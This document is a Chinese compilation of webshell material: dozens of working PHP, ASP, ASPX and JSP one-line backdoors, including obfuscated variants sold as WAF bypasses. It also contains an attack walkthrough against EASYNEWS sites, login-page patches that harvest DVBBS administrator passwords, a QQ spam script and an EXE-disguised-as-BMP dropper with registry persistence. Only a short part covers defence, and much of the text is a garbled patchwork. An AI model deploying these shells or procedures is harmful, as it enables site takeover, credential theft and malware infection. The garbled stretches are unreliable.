一句话木马图片制作(三种方法)重点讲义资料

攻防世界上传⼀句话⽊马这道题⾸先是检查出上传图⽚之后回响⼗分快，所以的话有理由相信这就是js前端过滤之后查看源代码发现的确是在前端就进⾏了过滤，只允许上传 jpg png。

下⾯是常识好吧。

前端过滤的常见⽅法：：1、filter()：数组的过滤器⽅法2、Object.keys()：es6提供的⽅法，⽤来获取对象键值对的键的集合3、every()：数组的every⽅法，因为检查数组内的所有元素是否都满⾜某⼀条件，如果都满⾜返回true,.如果有⼀项元素不满⾜就返回false。

4、includes():es7中提供的新⽅法，⽤于检测某字符串中是否包含给定的值，如果有返回true，没有返回false,数组中也有该⽅法//假设后端通过接⼝给我们的数据如下：下⾯是⼀个例⼦let data = [ {name: 'Andy',age: 13}, {name: 'Jack',age: 14}, {name: 'Lucy',age: 12} ]//在实际项⽬中，我们需要根据筛选框中的条件来实现数据的过滤,下⾯为过滤⽅法：//@param condition 过滤条件//@param data 需要过滤的数据let filter=(condition,data)=>{return data.filter( item => {return Object.keys( condition ).every( key => {return String( item[ key ] ).toLowerCase().includes(String( condition[ key ] ).trim().toLowerCase() )} )} )}//假设选择的条件为name中带字母a的元素var condition={name:'a'}filter(condition,data) //[ {name: 'Andy',age: 13},{name: 'Jack',age: 14}]//假设选择的条件为name中带字母a，⽽且age为13的元素var condition={name:'a',age:13}filter(condition,data) //[ {name: 'Andy',age: 13}]相当于是函数的使⽤⼀样了吧，，filter() 个⼈感觉是这样的⾸先是上传⼀句话⽊马，<?php @eval($_POST['attack']) ?>审计代码知道只能是上传 png j什么的格式之后就是把写好的⼀句话⽊马改后缀成png然后上传打开代理，使⽤ burpsuit 抓包，，，，这⾥的话⼀定要注意代开burpsuit的开关在上传，不要弄错，不然的话会抓到错误的包正确的包应该是有⽂件名和⽂件类型的⼀定要是这样的才⾏，之后就是把⽂件的后缀改成php这样就可以实现⽂件的绕过算了我现在还不知道为什么要这样做，，，，，，不过就是跟着做⽽已下⾯是参考的两篇博客：：：：这是我参考做出来的博客链接，，，，做的时候有两个要点：：：；⾸先是在burpsuit⾥⾯会返回⼀个⽂件，，，之后使⽤中国蚁剑连接的是返回加上那个⽂件的url，，不是之前原来的⽹页的url第⼆点是使⽤中国蚁剑的时候不能连校园⽹，这样的话打开不了⽂件管理，有时侯还连不上，保存之后就是直接接右键⽂件管理（添加成功之后），或者是直接双击打开，，，，，就是这样了。

一句话木马原理二、WEB一句话木马菜刀，Cknife，蚁剑这些工具原理比较接近，使用方法大家应该比较熟了，可能有些做渗透测试的朋友也没有了解过原理。

我们做防护规则，对常用的工具都会做分析，先以Cknife为例来分析这个系列。

2.1Ckinife连接2.1.1 PHP一句话连接Asp，aspx和PHP的连接原理比较接近，PHP最基础的一句话如下：<?php @eval($_POST['pass’]);?>通过Cknife等发包工具，把需要执行的php脚本片段，通过密码pass参数传给服务器端，服务器通过eval函数进行执行。

可以看出，一句话木马的本质是PHP,ASP(ASPX)语言具有eval函数，使之具有了动态性，基于动态性，攻击者就可以把命令传给服务器端的一句话木马进行执行，这些命令在config.ini作了定义。

发的请求包中，action参数用来传输base64编码后的命令，可能是考虑到特殊字符容易出问题或者不符合rfc协议之类的原因。

真正的连接密码pass，先对action参数做base64解密，然后传到服务器端执行。

我们把PHP命令做解码，得到@ini_set("display_errors","0");@set_time_limit(0);@set_magi c_quotes_runtime(0);echo("-|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($ F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){ $P=$D."/".$N;$T=@date("Y-m-dH:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P ),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."";if(@is_dir($P))$M.=$N."/ ".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();可以看到通过循环遍历某个路径下的文件，其中路径又是通过z1参数base64编码进行传递，截图是查看C盘目录。

⼀句话⽊马：ASPX篇aspx⽊马收集：<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>随⽇期变化的连接密码, 服务端写法：<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(" {0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>例如：菜⼑的密码为chopper，在前⾯加三个字符,新密码为：{D}chopper<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%><script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script><%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>密码 z<%@ Page Language="Jscript" validateRequest="false" %><%var kengkeng = Request.Item["never"];Response.Write(eval(keng,"unsafe"));%><%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>密码 -7<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>密码 abcd<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>过狗过D盾⼀句话<%@ Page Language="Jscript" Debug=true%><%vara=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));var c=eval(a,b);eval(c,b);%><%@ Page Language="Jscript" Debug=true%><%var a=Request.Form["pass"];var b="unsa",c="fe",d=b+c;function fun(){return a;}eval(fun(),d);%>。

木马的常用伪装手段
1木马程序更名:为增强木马程序的欺骗性，木马的设计者通常会给木马取一个极具迷
惑性的名称(一般与系统文件名相似，如svchOsto Exe等)或者允许控制端用户自由设定安装后的木马文件名。

这就使得用户很难判断所感染的木马类型。

2扩展名欺骗:这是黑客惯用的一-种手法，其主要是将木马伪装成图片、文本、Word
文档等文件，以掩饰自己真实的文件类型，例如将木马程序的名称为“文件名.exe"的文件改为“文件名txtexe”。

此时，用户只需把该文件的扩展名显示出来，就可以轻
松识别出此文件的类型。

3修改程序图标:木马服务端所用的图标有一定的规律可循,木马经常故意伪装成常用
图标的形式(例如文本文件的图标)，等待用户因为疏忽而将其认为是应用程序图标而
双击启动。

4捆绑文件:这种方式是将木马捆绑到- -个安装程序中，当用户双击启动程序时，木
马就会随之启动，并运行于计算机系统中。

被捆绑的文件一般是可执行文件，例如后
缀名为“.Exe”,“.COM”之类的文件。

5定制端口:老式木马的端口都是固定的，这位用户判断电脑是否带有木马带来了方便
o现在很多木马都加入了定制端口的功能，控制端用户可以在“1024-6535”之间任意
选择一个端口作为木马端口，这样大大提高了用户判断电脑感染木马类型的难度。

6自我复制:是为了弥补木马的一个缺陷而设计的当服务端用户打开含有木马的文件后，木马会将自己复制到系统目录中(C:WINDOWS System或C:WINDOWS\System32目录)。

各种⼀句话⽊马⼤全<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb")%>%><%Eval(Request(chr(35)))%><%<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%><%eval(Request.Item["c"],"unsafe");%>'备份专⽤<%eval(request("c")):response.end%>'⽆防下载表,有防下载表突破专⽤⼀句话<%execute request("c")%><%<%loop<%:%><%<%loop<%:%><%execute request("c")%><%execute request("c")<%loop<%:%>'防杀防扫专⽤<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>'不⽤"<,>"<script language=VBScript runat=server>execute request("c")</script><% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我⼀声⽼⼤'};lcx.性别((lcx.名字)+'') %><script language=vbs runat=server>eval(request("c"))</script><script language=vbs runat=server>eval_r(request("c"))</script>'不⽤双引号<%eval request(chr(35))%>'可以躲过雷客图<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") nguage="VBScript" ms.AddObject"response",response ms.AddObject"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%><%dy=request("dy")%><%Eval(dy)%>'容错代码if Request("sb")<>"" then ExecuteGlobal request("sb") end ifPHP⼀句话复制代码代码如下:<?php eval($_POST1);?><?php if(isset($_POST['c'])){eval($_POST['c']);}?><?php system($_REQUEST1);?><?php ($_=@$_GET1).@$_($_POST1)?><?php eval_r($_POST1)?><?php @eval_r($_POST1)?>//容错代码<?php assert($_POST1);?>//使⽤Lanker⼀句话客户端的专家模式执⾏相关的PHP语句<?$_POST['c']($_POST['cc']);?><?$_POST['c']($_POST['cc'],$_POST['cc'])?><?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使⽤这个后,使⽤菜⼑⼀句话客户端在配置连接的时候在"配置"⼀栏输⼊*/:<O>h=@eval_r($_POST1);</O><?php echo `$_GET['r']` ?>//绕过<?限制的⼀句话<script language="php">@eval_r($_POST[sb])</script>JSP⼀句话复制代码代码如下:<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>提交客户端<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>ASPX⼀句话<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>再补充⼏个：推荐还是把⼀句话加进图⽚⾥⾯去。

⼀句话⽊马使⽤演⽰（转载）实例⼀：“⼀句话⽊马”⼊侵“EASYNEWS新闻管理系统”“EASYNEWS新闻管理系统 v1.01 正式版”是在企业⽹站中⾮常常见的⼀套整站模版，在该⽹站系统的留⾔本组件中就存在着数据过滤不严漏洞，如果⽹站是默认路径和默认⽂件名安装的话，⼊侵者可以利⽤该漏洞直接上传ASP⽊马程序控制整个⽹站服务器。

Step1 搜索⼊侵⽬标使⽤了“EASYNEWS新闻管理系统 v1.01 正式版”的⽹站，在⽹站页⾯的底部版权声明处，往往会有关键字符为“ 版权所有”。

只要在GOOGLE或百度中以该字符串为关键词进⾏搜索，就可以找到⼤量的⼊侵⽬标。

Step2 检测⼊侵条件在这⾥，我们以⽹站“/news/index.htm”为例进⾏⼀次⼊侵检测。

“EASYNEWS新闻管理系统”⽹站的留⾔本数据库⽂件默认是位于“\ebook\db\ebook.asp”，⾸先在浏览器地址栏中输⼊“/news/ebook/db/ebook.asp”，回车后在浏览器页⾯中将显⽰访问留⾔本数据库⽂件的返回信息。

如果在页⾯中显⽰乱码，则说明该⽹站的留⾔本数据库⽂件没有改名，可以进⾏⼊侵。

Step3 在数据库中插⼊ASP后门前⾯提到了该新闻系统的留⾔本插件存在过滤不严，因此我们可以通过提交发⾔，在数据库中插⼊“⼀句话⽊马”服务端代码：在浏览器中访问“/news/khly.htm”，打开提交留⾔页⾯。

在提交页⾯中的“主页”栏中，直接填写“⼀句话⽊马”服务端代码，其它随便填写。

确定后点击“发表留⾔”按钮，⽂章发表成功后，即可将“⼀句话⽊马”服务端代码插⼊到留⾔本数据库中了。

Step4 连接后门上传Webshell由于留⾔本数据库⽂件“ebook.asp”是⼀个ASP⽂件，所以我们插⼊到数据库⽂件中的ASP语句将会被执⾏。

将“⼀句话⽊马”客户端中的提交地址改为留⾔本数据库⽂件地址，然后⽤浏览器打开客户端，在上⽅的输⼊框中输⼊上传ASP⽊马的保存路径，在下⾯的输⼊框中可以粘贴⼊其它的ASP⽊马代码，这⾥选择的是桂林⽼兵⽹站管理助⼿ASP代码。

PHP之⼀句话⽊马什么是⼀句话⽊马⼀句话⽊马就是只需要⼀⾏代码的⽊马，短短⼀⾏代码，就能做到和⼤马相当的功能。

为了绕过waf的检测，⼀句话⽊马出现了⽆数中变形，但本质是不变的：⽊马的函数执⾏了我们发送的命令。

我们如何发送命令，发送的命令如何执⾏？我们可以通过GET 、POST 、COOKIE这三种⽅式向⼀个⽹站提交数据，⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据，并把接收的数据传递给⼀句话⽊马中执⾏命令的函数，进⽽执⾏命令。

所以看到的经典⼀句话⽊马⼤多都是只有两个部分，⼀个是可以执⾏代码的函数部分，⼀个是接收数据的部分。

例如：<?php eval(@$_POST['a']); ?>其中eval就是执⾏命令的函数，$_POST['a']就是接收的数据。

eval函数把接收的数据当作PHP代码来执⾏。

这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。

这便是⼀句话⽊马的强⼤之处。

⽰例：使⽤其他函数制作⼀句话⽊马assert函数<?php assert(@$_POST['a']); ?>create_function函数<?php$fun = create_function('',$_POST['a']);$fun();>把⽤户传递的数据⽣成⼀个函数fun()，然后再执⾏fun()call_user_func回调函数<?php@call_user_func(assert,$_POST['a']);>call_user_func这个函数可以调⽤其它函数，被调⽤的函数是call_user_func的第⼀个函数，被调⽤的函数的参数是call_user_func的第⼆个参数。

常见ASP一句话木马分析及防御作者：罗婷罗芳来源：《电子技术与软件工程》2013年第22期摘要什么是一句话木马？一句话木马本身并不是任何黑客程序，只是在很多网站上都会使用到的普通代码。

一句话木马只是网络攻击当中的一个小块，但通过对其防御可以大大减少相关的攻击。

【关键词】木马分析木马防御很多制作网站的朋友经常会听到一句话：“我的网站又被一句话木马入侵了。

”但什么是一句话木马？一句话木马本身并不是任何黑客程序，只是在很多网站上都会使用到的普通代码。

但这个代码会给网站打开一个缺口，通过这个缺口黑客可以将真正的木马，也就是通常所说的“大马”注入到网站服务器当中。

“大马”注入到网站服务器后，可通过控制整个网站的所有的源代码，其中程序修改或删除网站的其它内容。

如果一不小心注入的是网站服务器，那么影响的就不是一个网站，而是整个网站服务器上的所有网站。

黑客通常通过google网站查找到全部ASP类型的网站。

然后，在留言板或文章发表区域等可以将内容上传到服务器上的地方输入一句话木马。

也就是想办法将一句话木马程序代码添加到网站的后台数据库。

目前在当下黑客经常使用的ASP一句话木马主要有下面几种：（1）<% execute（request（"value"）） %>（2）<% execute request（"value"） %>（3）<% eval request（"value "） %>（4）<% eval request（value） %>通过语法变形后还有下列几种：（1）<% If Request（"value"）<>"" Then Execute（Request（"value"））%>（2）（3）<% eval（Request.Item["value"]，"unsafe"）；%>如果再继续完善后，甚至可以绕过网站漏洞筛查程序，在这里不作说明。

php get一句话木马一句话木马是指由一句简短的PHP代码组成的恶意程序，它通常被用来攻击网站。

被攻击的网站会有一个被植入的含有一句话木马的PHP文件，这个文件可以让黑客远程控制网站，对网站进行各种操作，如上传、下载、删除文件，修改数据库等。

一句话木马的定义一句话木马（One Line Trojan Horse），也叫做一句话后门，是一种简单、直接的攻击方式。

一句话木马通常是指一行简短的PHP代码，可以在Web服务器上运行，实现代码执行的功能。

因为一句话代码很短小，所以便于黑客进行隐藏和传播。

然而，一旦黑客成功地在受害者网站上植入了一句话木马，那么他们就可以远程控制受害者网站，进行各种非法操作。

一句话木马具有以下特点：1. 隐藏性高。

一句话木马只需要一句短小的PHP代码即可实现功能，而且代码很容易隐藏起来，常常被植入在正常代码中，难以被发现。

2. 传播速度快。

一旦黑客成功地在受害者网站上植入了一句话木马，那么他们就可以利用蠕虫等恶意程序快速传播，感染更多的网站。

3. 控制权限高。

一旦黑客远程控制受害者网站，他们就可以在没有管理员权限的情况下，修改、删除、上传、下载网站文件，随意操作网站。

一句话木马攻击手段一句话木马的攻击手段大致可以分为以下几种：1. 利用文件上传漏洞。

黑客通过网站上的文件上传功能，上传一句话木马到网站服务器上。

2. 利用SQL注入漏洞。

黑客通过SQL注入漏洞，执行一句话木马的PHP代码。

3. 利用其他漏洞。

黑客通过其他漏洞，如CMS漏洞或者WEB服务器漏洞，实现植入一句话木马的目的。

一句话木马防范措施为了避免遭受一句话木马攻击，网站管理员应该采取以下几个防范措施：1. 对于文件上传功能，应该限制上传的文件类型和大小，并对上传的文件进行严格的过滤。

2. 对于SQL注入漏洞，应该对数据库进行良好的保护，并避免将数据库密码等敏感信息泄露出去。

3. 对于CMS漏洞或WEB服务器漏洞，应该及时安装相关的安全补丁，并对网站进行全面的安全检查。

图片马制作指导.txt你不能让所有人满意，因为不是所有的人都是人成功人士是—在牛B的路上，一路勃起你以为我会眼睁睁看着你去送死吗？我会闭上眼睛的1.名称：自己如何动手制作图片形式的ASP木马（还要可显示图片）建一个asp文件，内容为找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索 shell代码插在这里，最好是小马，还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法，在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp （3）前提得到system权限，进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar，此工具在该电脑生成一个超级用户用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 7．名称：QQ群脚本攻击打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马（1）用杀毒软件（2）用FTP客户端软件，点"工具"->"比较文件夹" （3）用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马（4）用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了laner.txt （2）login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间，用户名和密码（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称：利用QQ在线状态抓鸽子肉鸡生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称：媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称：免费电话＋MSH命令行工具/ 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。

一句话木马的原理及利用（asp,aspx,php,jsp）一句话木马的适用环境：1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可一句话木马的工作原理："一句话木马"服务端（本地的html提交文件）就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为<%execute request("value")%> 其中value可以自己修改"一句话木马"客户端（远程服务器上被插入一句话的asp文件）用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件现在先假设在远程主机的TEXT.ASP(客户端）中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)<form action=http://主机路径/TEXT.asp method=post><textarea name=value cols=120 rows=10 width=45>set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp</textarea><textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br><input type=submit value=提交></form>表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的V ALUE一样,就是我用蓝色标记的那两处,必须相等)说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.具体的就是下面这一段:set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。

另类⽹站⼊侵之⼀句话⽊马图⽚的妙⽤这篇⽂章有点标题党了，⼀句话⽊马⼤家都不陌⽣，我想很多菜菜都体验过他的强⼤之处吧。

提起⼀句话我们不由得想起了laker⼤侠啊。

可以说laker⼤侠的⼀句话⽊马真是为我们⼴⼤脚本⼊侵者带来不少的⽅便。

今天我要讲述的这个⼊侵过程就和⼀句话⽊马密不可分，说到这⼤家应该都知道最终拿下这个站的的⽅法肯定是利⽤⼀句话了。

不过这个站我还是费了好⼤周折才成功拿下⼀句话的。

下⾯让我们⼀起回顾下整个过程吧。

不会熟练使⽤⼀句话的⼩菜们可要认真看了，能熟练运⽤⼀句话的⼤虾们也不要骄傲，说不定下⾯的⽅法就是你没有尝试过的哦。

好了，事情起因还是以⼩菜拿到了⽹站后台没法拿webshell，找我求助来了，我们还是先到⽹站后台看看到底是什么样⼀个状况吧。

⽹址我就不发出来了，免得有些⼈品不好的⼩菜们拿去搞破坏。

是⼀个什么电⼦商城的后台，不过我之前在前台看了下给⼈的感觉就是不怎么样，刚那⼩菜应该就是通过注⼊漏洞拿到的账号和密码。

⼤约在后台看了下基本情况，寻找可利⽤的信息，有⼀个ewebeditor的编辑器，不过貌似是2.16以上版本的，不存在注⼊漏洞；另外有⼀个图⽚上传的功能；还有⼀个数据库备份恢复功能，⼤致这些地⽅都是可以利⽤的。

不过ewebeditor我已经尝试了，默认登录界⾯删除，数据库名称更改不可下载。

admin_style.asp⽂件验证⽅式独⽴，没有与主站后台使⽤同⼀种验证，有的⽹站的ewebeditor的后台验证与⽹站后台⼀直，这就导致登录⽹站后台后就可以直接访问编辑器后台程序。

另外就是数据库备份，⼤家可以看下图：可见该备份功能不可⾃定义源数据库路径名称及备份致的数数据库路径或名称，不过当时看到这⾥我⼼理⾯有了⼀个想法就是既然不可以⾃⼰定义路径及名称，我可以⾃⼰抓包然后更改数据库后提交。

这个⽅法我以前在其他⽹站上有试过，⽽且成功过。

主要就是针对类似的数据库备份功能，使⽤抓包⼯具抓下来然后更改后再⽤NC提交。

何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE的编码漏洞实现自动下载和执行。

然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP文件,把它拷贝到TEMP目录。

再编写一个脚本把找到的BMP文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行.但是这种技术只能在9X下发挥作用，对于2K、XP来说是无能为力了。

看上去好象很复杂,下面我们一步一步来:1) EXE变BMP的方法大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。

我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG文件做过试验，发现如果文件头不正确的话，是不会下载的，转换代码如下：FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow;col := 4;while true do beginif (fs mod 12)=0 then beginlen:=fs;end else len:=fs+12-(fs mod 12);row := len div col div 3;if row>col then begincol:=col+4;end else Break;end;FillChar(buffer,256,0);{一下为BMP文件头数据}Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col;PDWORD(@buffer[22])^:=row;PDWORD(@buffer[34])^:=len;PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54;PDWORD(@buffer[14])^:=40;PWORD(@buffer[26])^:=1;以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入exe2bmp myexe.exe mybmp.bmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式.接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式以下是放在网页上的脚本var st=fso.CreateTextFile(vbs,true);st.WriteLine('Option Explicit');st.WriteLine('Dim FSO,WSH,CACHE,str');st.WriteLine('Set FSO =CreateObject("Scripting.FileSystemObject")');st.WriteLine('Set WSH = CreateObject("WScript.Shell")');st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\vbs")');st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\tmp","tmp.exe"');st.WriteLine('SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"');st.WriteLine('WScript.Quit()');st.WriteLine('Function SearchBMPFile(Folder,fname)');st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');st.WriteLine(' str=FSO.GetParentFolderName(folder) &"\\" & & "\\" & fname');st.WriteLine(' if FSO.FileExists(str) then');st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');st.WriteLine(' set File=FSO.GetFile(str)');st.WriteLine(' File.Copy(tmp & "tmp.dat")');st.WriteLine(' File.Delete');st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');st.WriteLine(' Lt.WriteLine("rbx")');st.WriteLine(' Lt.WriteLine("0")');st.WriteLine(' Lt.WriteLine("rcx")');st.WriteLine(' Lt.WriteLine("1000")');st.WriteLine(' Lt.WriteLine("w136")');st.WriteLine(' Lt.WriteLine("q")');st.WriteLine(' Lt.Close');st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat<" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');st.WriteLine(' On Error Resume Next ');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');st.WriteLine(' end if');st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');st.WriteLine(' For Each SubFolder In Folder.SubFolders');st.WriteLine(' SearchBMPFile SubFolder,fname');把该脚本保存为"js.js",在网页中插入:该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件，该脚本文件会在下次开机时自动运行。

⽂件上传之⼀句话⽊马原理及制作⼀句话⽊马概念【基本原理】利⽤⽂件上传漏洞，往⽬标⽹站中上传⼀句话⽊马，然后你就可以在本地通过中国菜⼑chopper.exe即可获取和控制整个⽹站⽬录。

@表⽰后⾯即使执⾏错误，也不报错。

eval（）函数表⽰括号内的语句字符串什么的全都当做代码执⾏。

$_POST['attack']表⽰从页⾯中获得attack这个参数值。

